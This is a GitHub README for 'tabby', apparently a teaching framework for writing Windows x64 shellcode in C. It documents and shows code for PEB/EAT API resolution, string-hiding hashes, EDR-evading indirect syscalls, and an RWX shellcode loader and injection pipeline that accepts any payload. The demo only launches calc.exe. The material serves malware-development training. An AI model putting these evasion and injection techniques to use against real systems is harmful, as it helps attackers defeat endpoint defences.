Skip to content

cocomelonc/tabby

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

tabby

a minimal, position-independent C shellcode micro framework for Windows x64.

img

compiles entirely on Linux with mingw-w64 and nasm. output is a flat raw binary (shellcode.bin) with no PE header, no imports, no CRT - ready to inject into any process.

designed for the course Malware Development for Ethical Hackers (2026).


tabby - the main concept

a position-independent C shellcode framework that compiles entirely on Linux and produces flat raw bytes that survive injection into any Windows x64 process - with EDR-evading indirect NT syscalls baked in.

the four ideas that hold it together:

write shellcode in C, not assembly. - you write a normal sc_main(PVOID base) function. the framework handles PIC, base-address recovery, API resolution, and syscall dispatch. The asm is confined to a 20-line entry stub and 3-instruction syscall stubs generated by a macro.

no PE header, no IAT, no CRT. - output is a flat .bin blob starting at byte 0 with _start at offset 0. No imports - every Windows API is resolved at runtime by FNV-1a hash via PEB walk + EAT walk. No libc - STACKSTR builds strings on the stack so they never appear in .rdata.

indirect syscalls that look clean on the call stack. - instead of executing syscall ourselves (which leaves our shellcode as the return address - flagged by call-stack-aware EDRs), each stub jumps to the syscall; ret gadget that already exists inside ntdll's own stub, past the EDR's inline hook. The kernel sees a return address inside ntdll.

linux-only toolchain. - mingw-w64 + nasm + a custom linker script + objcopy. Zero Windows dependency to build.

the framework is small enough to read end-to-end in one sitting (~500 lines of C + ~80 lines of NASM) and every component answers a specific detection problem:

entry.asm - how does shellcode find its own base address? (RDIP)
resolve.c - how do we call Windows APIs with no IAT? (PEB + EAT walk)
pic.h - how do we avoid string IOCs? (FNV-1a hashes + STACKSTR)
stubs.asm - how do we bypass EDR hooks on ntdll? (indirect syscalls)
syscall.c - how do we get SSNs without hardcoding them? (runtime extraction)
flat.ld - how do we produce raw bytes from a normal toolchain? (linker script + objcopy)

other projects either hide these mechanics behind code generators (SysWhispers) or are too big to study (Cobalt Strike). tabby is the minimum viable framework that makes each technique inspectable.


what it is not

not a C2 or post-exploitation framework.
not a packer or crypter for existing PE files.
not a polished offensive tool - it's a teaching framework for "Malware Development for Ethical Hackers" trainings. the README documents the why of every design decision (the project structure rationale table) precisely because the goal is for the reader to understand the choices, not just run the binary.


core concepts

before using this tool, you need to understand four ideas that the whole framework is built on. Each one is a direct answer to a specific detection problem.

1. position-independent code (PIC)

a normal Windows EXE assumes it will be loaded at a fixed virtual address. the linker hard-codes absolute addresses for every function call, global variable, and string literal. If the code is copied somewhere else in memory and jumped into, those hard-coded addresses point to garbage and the process crashes.

shellcode must work regardless of where it lands in memory. Every reference to data or other code must be relative to the current instruction pointer.

on x86-64 this is mostly natural: CALL rel32 and LEA reg, [rip+N] are both RIP-relative by design. The problems are:

strings and constants. The compiler normally puts them in .rdata at a fixed address. We merge .rdata into .text via the linker script and generate them on the stack at runtime with the STACKSTR macro.
global variables. The SSN slots and the gadget pointer must live somewhere the stubs can find them via [rel label]. We keep them in .text too; the linker script discards .data and .bss.
_start at byte 0. The entry object is pinned first in the linker script so jumping to the first byte of shellcode.bin always lands in _start.

the entry stub (asm/entry.asm) uses a classic RDIP trick to recover its own load address:

  call  .here
.here:
  pop   rcx                     ; rcx = runtime address of .here
  sub   rcx, (.here - _start)   ; rcx = base of shellcode

this gives sc_main() a pointer to the shellcode's own base, useful if you embed a secondary payload or config block after the code.

2. API resolution without imports

every Windows API call in a normal program goes through the Import Address Table. the PE loader fills the IAT at load time by calling LoadLibrary and GetProcAddress on your behalf. A flat shellcode blob has no IAT. we have to find APIs ourselves.

the mechanism is a walk of the Process Environment Block (PEB):

gs:[0x60]  ->  PEB
              └─ Ldr  ->  PEB_LDR_DATA
                          └─ InLoadOrderModuleList  (doubly-linked)
                              ├─ ntdll.dll
                              ├─ kernel32.dll
                              └─ ...

every loaded DLL appears in this list with its base address and name. once we have a module base we walk its Export Address Table (EAT) - three parallel arrays of names, ordinals, and function RVAs - to find a specific export by name.

comparing strings at runtime is noisy and leaves IOCs. We compare hashes instead. The hash function is FNV-1a 32-bit (fast, good distribution, trivial to implement without a CRT):

DWORD fnv1a(const char *s) {
  DWORD h = 0x811c9dc5;
  while (*s) { h ^= (BYTE)*s++; h *= 0x01000193; }
  return h;
}

pre-computed hash constants live in include/ntapi.h. Use tools/hash.py to generate or verify them:

$ python3 tools/hash.py NtAllocateVirtualMemory ntdll.dll
  NtAllocateVirtualMemory  ->  0xca67b978u
  ntdll.dll                ->  0xa62a3b3bu

img

DLL names are matched case-insensitively (lowercased in the LDR walk). export names are case-sensitive because the EAT preserves the original casing.

3. indirect syscalls

calling NtAllocateVirtualMemory from our shellcode in the normal way (call the ntdll export) is caught by every modern EDR. The EDR installs an inline hook - it overwrites the first bytes of the ntdll stub with a JMP into the EDR's own code, which inspects the call before letting it proceed.

Direct syscalls bypass the hook by putting the system call number (SSN) into EAX and executing syscall ourselves:

  mov  eax, 0x18       ; SSN for NtAllocateVirtualMemory
  mov  r10, rcx        ; NT ABI: r10 must mirror rcx
  syscall

this dodges the hook, but creates a new problem: the thread call stack shows our_shellcode+N -> NtAllocateVirtualMemory. Call-stack-aware EDRs flag any syscall whose return address is not inside ntdll.

indirect syscalls fix this. Instead of executing syscall ourselves, we jump to the syscall; ret instruction that already exists inside ntdll's own stub - past the hook:

ntdll!NtAllocateVirtualMemory:
  4C 8B D1        mov r10, rcx      <- hook overwrites here
  B8 18 00 00 00  mov eax, 0x18
  0F 05           syscall           <- we jump to here
  C3              ret

now the return address that the kernel sees is inside ntdll. The call stack looks clean.

the SSN is extracted at runtime by scanning the ntdll stub for the mov eax, imm32 byte pattern (0xB8). this works even on hooked stubs because hooks typically overwrite the first bytes (the mov r10, rcx prologue) while leaving the mov eax bytes intact further down:

static DWORD extract_ssn(PBYTE stub) {
  for (int i = 0; i < 32; i++) {
    if (stub[i] == 0xB8) {
      DWORD ssn = *(DWORD *)(stub + i + 1);
      if (ssn < 0x600) return ssn;   // sanity: no NT SSN is >= 0x600
    }
  }
  return (DWORD)-1;
}

4. the toolchain: why it all runs on Linux

a Windows PE is compiled for Windows but the compilation itself is just translating C source and ASM to machine code. mingw-w64 is a complete win64 cross-compiler that runs on Linux and produces native Windows COFF object files and PE executables.

the flat binary extraction step uses objcopy to peel the .text section out of the PE wrapper:

C source  ->  x86_64-w64-mingw32-gcc      ->  Win64 COFF .o
ASM       ->  nasm -f win64               ->  Win64 COFF .o
COFF .o   ->  x86_64-w64-mingw32-ld       ->  PE .elf  (single .text section)
PE .elf   ->  x86_64-w64-mingw32-objcopy  ->  shellcode.bin  (raw bytes)

nothing in this pipeline touches Windows. the output runs on Windows because the machine code is win64 ABI compliant.


repository layout

tabby/
├── include/
│   ├── types.h        windows types from scratch - no SDK, no CRT headers   
│   ├── pic.h          FNV-1a hash, STACKSTR macro, GETAPI helper, module hashes   
│   └── ntapi.h        NT function pointer types, sc_* declarations, hash constants   
├── src/
│   ├── crt.c          sc_memcpy / sc_memset / sc_memcmp / sc_strlen   
│   ├── resolve.c      find_module (PEB walk) + resolve_export (EAT walk) + find_syscall_gadget   
│   └── syscall.c      SSN extraction + syscall_init()   
├── asm/
│   ├── entry.asm      _start at byte 0: RDIP -> sc_main(base)   
│   └── stubs.asm      SSN slots + g_syscall_gadget + indirect syscall stubs (8 NT functions)   
├── ld/
│   └── flat.ld        linker script: flatten .text and .rdata$* into single .text at offset 0   
├── example/
│   ├── exec.c         minimal demo: PEB walk -> kernel32 -> WinExec("calc.exe")   
│   └── alloc_exec.c   full demo: syscall init -> NtAlloc -> NtWrite -> NtProtect RWX -> NtCreateThreadEx   
└── tools/
    ├── hash.py        FNV-1a pre-computation for ntapi.h constants    
    └── loader.c       minimal Win64 test loader: maps shellcode.bin and executes it    

dependencies

install on Ubuntu / Debian:

sudo apt install mingw-w64 nasm binutils-mingw-w64-x86-64

img

that is all. No MSVC, no Windows SDK, no Wine.


Build

git clone https://github.com/cocomelonc/tabby
cd tabby
make

expected output:

nasm -f win64 -I include/ asm/entry.asm -o obj/entry.o
nasm -f win64 -I include/ asm/stubs.asm -o obj/stubs.o
x86_64-w64-mingw32-gcc ... -c src/crt.c     -o obj/crt.o
x86_64-w64-mingw32-gcc ... -c src/resolve.c -o obj/resolve.o
x86_64-w64-mingw32-gcc ... -c src/syscall.c -o obj/syscall.o
x86_64-w64-mingw32-gcc ... -c example/alloc_exec.c -o obj/alloc_exec.o
x86_64-w64-mingw32-ld -T ld/flat.ld --gc-sections -o bin/shellcode.elf ...
x86_64-w64-mingw32-objcopy --only-section=.text -O binary ...
[=^..^=] shellcode.bin  1760 bytes

img

the only warning (section below image base) is expected - we intentionally place .text at virtual address 0 so the flat binary starts at byte 0.

output: bin/shellcode.bin - a raw x64 shellcode blob.

img

a smaller standalone test shellcode (PEB walk + WinExec only, no indirect NT syscalls) is also available:

make exec      # produces bin/exec.bin (~416 bytes)

useful for sanity-checking the framework on a new target before exercising the full NT syscall path.

img


how to verify the output

disassemble the first bytes on Linux to confirm _start is at offset 0:

ndisasm -b 64 bin/shellcode.bin | head -20

expected:

00000000  53                push rbx
00000001  57                push rdi
00000002  56                push rsi
00000003  4883EC20          sub rsp,byte +0x20   ; shadow space, preserves 16-byte alignment
00000007  E800000000        call 0xc
0000000C  59                pop rcx              ; <- RDIP trick
0000000D  4883E90C          sub rcx,byte +0xc    ; rcx = base of shellcode
00000011  E8XXXXXXXX        call sc_main
...
0000001E  6690              xchg ax,ax           ; padding to 0x20
00000020  0000              ssn_NtAllocateVirtualMemory  (dd 0, populated at runtime)
00000024  0000              ssn_NtWriteVirtualMemory
...
00000040  0000              g_syscall_gadget (dq 0)
00000048  8B0500000000      mov eax,[rel ssn_NtAllocateVirtualMemory]  ; <- first syscall stub

img

the RDIP sequence at 0x07–0x0D is the canonical PIC base-address recovery.
SSN slots and the gadget pointer live in .text (offsets 0x200x47) so they survive the objcopy --only-section=.text extraction and remain reachable via RIP-relative addressing at any load address.
the first syscall stub starts at 0x48.


running on Windows

bin/shellcode.bin is a raw byte blob - not an executable. to run it on Windows you need a loader: a normal Win32 program that maps the blob into memory and jumps into it.

build the loader

on Linux, cross-compile tools/loader.c with:

make loader

this produces bin/loader.exe using mingw-w64 - no Windows required.

img

deploy

copy both files to the same folder on the Windows machine:

bin/shellcode.bin
bin/loader.exe

run

.\loader.exe shellcode.bin

img

or, to test the smaller standalone shellcode first:

.\loader.exe exec.bin

img

both pop calc.exe. the difference is that exec.bin calls WinExec directly (PEB walk + EAT walk only), while shellcode.bin does the full indirect-NT-syscall injection pipeline (NtAllocateVirtualMemory -> NtWriteVirtualMemory -> NtProtectVirtualMemory -> NtCreateThreadEx) with exec.bin's bytes as the embedded payload.

if exec.bin pops calc but shellcode.bin does not, the bug is somewhere in the indirect-syscall path (SSN extraction, gadget address, stub calling convention, or NtCreateThreadEx arguments) - not the framework basics.

what the loader does

fopen("shellcode.bin", "rb")          // reads the raw bytes
VirtualAlloc(NULL, sz, RW)            // allocates a private RW region
fread -> buf                           // copies shellcode in
VirtualProtect(buf, sz, RWX)          // flips the region to execute-read-write
CreateThread(buf)                     // spawns a thread at byte 0
WaitForSingleObject(thread, INFINITE) // waits for shellcode to return
VirtualFree + CloseHandle             // cleans up

the region is mapped RWX (not RX) because syscall_init() writes the extracted SSN values into the shellcode's own .text section at runtime. without write access the first store would #AV and the thread would terminate silently.

the loader prints the load address before jumping so you can attach a debugger at the right offset if needed:

[=^..^=] loaded 1760 bytes from shellcode.bin
[=^..^=] executing at 0x000001A2B3C40000

the bundled example payload (example/alloc_exec.c) spawns calc.exe:

  1. allocates a fresh RW region via NtAllocateVirtualMemory (indirect syscall)
  2. writes an embedded mini-shellcode (PAYLOAD[] = example/exec.c compiled output: PEB walk -> WinExec("calc.exe"))
  3. flips the region to RWX via NtProtectVirtualMemory
  4. spawns a thread on it via NtCreateThreadEx
  5. waits for the thread, closes the handle, frees the region

swap PAYLOAD[] with any position-independent x64 shellcode and rebuild with make.


writing your own shellcode

  1. copy example/alloc_exec.c or example/exec.c as a starting template, or create a new file in example/.
  2. write a sc_main(PVOID base) function. If you call any sc_Nt* stub, call syscall_init(ntdll) first. base is the runtime address of byte 0 of your shellcode, useful if you embed config or a secondary payload after the code.
  3. add a build rule for your .c file in Makefile and list its .o in C_OBJS (or replace alloc_exec.o).
  4. run make (or make exec for a variant that excludes the syscall stubs entirely).

using the PEB resolver

PVOID ntdll    = find_module(H_NTDLL);
PVOID kernel32 = find_module(H_KERNEL32);

to resolve any export by name:

typedef HANDLE (*GetStdHandle_t)(DWORD);
GetStdHandle_t pGetStdHandle = (GetStdHandle_t) resolve_export(kernel32, H_GetStdHandle);

or with the GETAPI macro:

HANDLE h = GETAPI(H_KERNEL32, H_GetStdHandle, GetStdHandle_t)(STD_OUTPUT_HANDLE);

using the indirect syscalls

after syscall_init(ntdll), call the sc_Nt* functions exactly like the real NT API:

PVOID  region = NULL;
SIZE_T size   = 4096;

NTSTATUS st = sc_NtAllocateVirtualMemory(
    (HANDLE)-1,               // current process 
    &region,
    0,
    &size,
    MEM_COMMIT | MEM_RESERVE,
    PAGE_READWRITE);

if (!NT_SUCCESS(st)) { // handle error }

available stubs:

function args notes
sc_NtAllocateVirtualMemory 6 allocate memory in a process
sc_NtWriteVirtualMemory 5 write across process boundary
sc_NtProtectVirtualMemory 5 change page protection
sc_NtFreeVirtualMemory 4 release allocation
sc_NtCreateThreadEx 11 spawn thread in local or remote process
sc_NtWaitForSingleObject 3 wait on a handle
sc_NtClose 1 close a handle
sc_NtTerminateProcess 2 terminate a process

strings - never in .rdata

do not write:

const char *msg = "hello";   // ends up in .rdata -> fixed address -> crash

Use STACKSTR instead:

STACKSTR(msg, "hello");      // pushed onto the stack character by character

adding a new NT syscall stub

step 1 - add the SSN slot and stub to asm/stubs.asm (slot lives in .text, not .bss, so it survives flat-binary extraction):

global ssn_NtOpenProcess
ssn_NtOpenProcess: dd 0

STUB NtOpenProcess, ssn_NtOpenProcess

the STUB macro is a single, ABI-clean stub - no argument shifting needed for any number of arguments because the Win64 calling convention already places args 5+ at [rsp+28h], exactly where the kernel reads them.

step 2 - declare the SSN extern and add the LOAD_SSN call inside src/syscall.c:

extern DWORD ssn_NtOpenProcess;
...
LOAD_SSN(ssn_NtOpenProcess, H_NtOpenProcess);

step 3 - add the hash constant to include/ntapi.h:

#define H_NtOpenProcess  0xXXXXXXXXu

compute it:

python3 tools/hash.py NtOpenProcess

img

step 4 - declare the prototype in include/ntapi.h:

NTSTATUS sc_NtOpenProcess(HANDLE *, DWORD, OBJECT_ATTRIBUTES *, CLIENT_ID *);

how indirect syscall dispatch works (step by step)

take sc_NtAllocateVirtualMemory as the example. the caller in C is:

sc_NtAllocateVirtualMemory((HANDLE)-1, &region, 0, &size, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);

win64 calling convention maps this to:

RCX  = (HANDLE)-1
RDX  = &region
R8   = 0
R9   = &size
[RSP+0x28] = MEM_COMMIT|MEM_RESERVE    <- 5th arg on stack
[RSP+0x30] = PAGE_READWRITE            <- 6th arg on stack

inside the stub:

sc_NtAllocateVirtualMemory:
    mov  eax, dword [rel ssn_NtAllocateVirtualMemory]  ; EAX <- SSN
    mov  r10, rcx                                       ; R10 <- RCX  (NT ABI)
    jmp  qword [rel g_syscall_gadget]

three instructions. that's it. the stub does not touch the stack, does not shift arguments, and does not modify RSP. the Win64 calling convention already places args 5+ at [rsp+28h], [rsp+30h], ... and the kernel reads them from those exact offsets after syscall. nothing extra to do.

at the point of JMP, the register and stack state is:

EAX  = SSN
R10  = (HANDLE)-1                    <- arg 1 (kernel reads R10, not RCX, after syscall)
RDX  = &region                       <- arg 2
R8   = 0                             <- arg 3
R9   = &size                         <- arg 4
[RSP+0x28] = MEM_COMMIT|MEM_RESERVE  <- arg 5
[RSP+0x30] = PAGE_READWRITE          <- arg 6

the JMP lands at the syscall; ret bytes inside ntdll's own NtAllocateVirtualMemory stub, past any EDR hook. The kernel executes the syscall and rets back to the call site inside ntdll. The call stack that the kernel and any call-stack scanner observes has a return address inside ntdll - not inside our shellcode.


replacing the payload

the example/alloc_exec.c demo ships with the compiled bytes of example/exec.c (PEB walk -> WinExec("calc.exe")) as PAYLOAD[]. To use your own:

static const BYTE PAYLOAD[] = {
  // paste your x64 shellcode bytes here
  0x48, 0x31, 0xc0, ...
};

regenerate the bytes from a fresh make exec build:

make exec
python3 -c "
data = open('bin/exec.bin','rb').read()
for i in range(0, len(data), 12):
    print('  ' + ', '.join(f'0x{b:02x}' for b in data[i:i+12]) + ',')
"

or generate shellcode with any external framework (msfvenom, donut, your own) and paste the byte array.
the framework handles allocation, write, protection flip, and thread creation - you only need to provide the bytes.


project structure rationale

decision reason
-nostdlib -nostdinc -ffreestanding zero CRT dependency; everything in the binary came from our own source
-fno-builtin prevents GCC emitting implicit memcpy/memset calls to CRT
-mno-red-zone Win64 does not honour the System V red zone; without this, signal delivery or asynchronous callbacks can corrupt our stack frame
-mcmodel=small critical: forces direct IMAGE_REL_AMD64_REL32 relocations for global symbol access. without it, mingw64 emits .refptr.<sym> indirection through .rdata that holds the absolute link-time VMA. for our flat binary with . = 0 that VMA is meaningless at runtime; every SSN store would crash with #AV
-fno-asynchronous-unwind-tables suppresses .eh_frame generation; we discard it anyway but this avoids linker noise
-ffunction-sections -fdata-sections + ld --gc-sections dead-code elimination: drops unused symbols (e.g. sc_memcpy if no STACKSTR is large enough to need it) so the binary contains only what's actually called
-Os size optimisation keeps shellcode small; also discourages the compiler from emitting CRT helper calls
nasm -f win64 produces Win64 COFF objects compatible with mingw-w64-ld; full access to NASM macros for clean stub generation
SSN slots in .text (via NASM dd 0) mingw64 places C globals in .bss, which our linker script discards. defining the slots in NASM's .text section guarantees they survive objcopy --only-section=.text and the stubs' [rel ssn_*] displacements resolve correctly
linker script at . = 0 + .rdata$* .text$* merged into .text lets objcopy --only-section=.text produce a flat binary starting at offset 0 with no PE overhead; the $* wildcards catch COFF section groups emitted by -ffunction-sections/-fdata-sections
entry stub sub rsp, 0x20 (not 0x28) after push rbx/rdi/rsi the stack is already 16-aligned. sub rsp, 0x20 (32, a multiple of 16) preserves alignment so sc_main receives the Win64-ABI-correct RSP mod 16 = 8. otherwise MOVAPS inside any Windows DLL (e.g. CreateProcess inside WinExec) raises #AC and the thread dies silently
FNV-1a over CRC32 equally fast, no special instructions required, fits in 6 lines of C
per-function SSN slots avoids a generic do_syscall(ssn, ...) wrapper that would need to shift a variable number of stack arguments; each stub has the exact Win64 signature the kernel expects

attention

this tool is a proof of concept for educational purposes only. the author takes no responsibility for any damage caused by misuse.

license

MIT

About

a minimal, position-independent C shellcode framework for Windows x64. compiles entirely on Linux

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors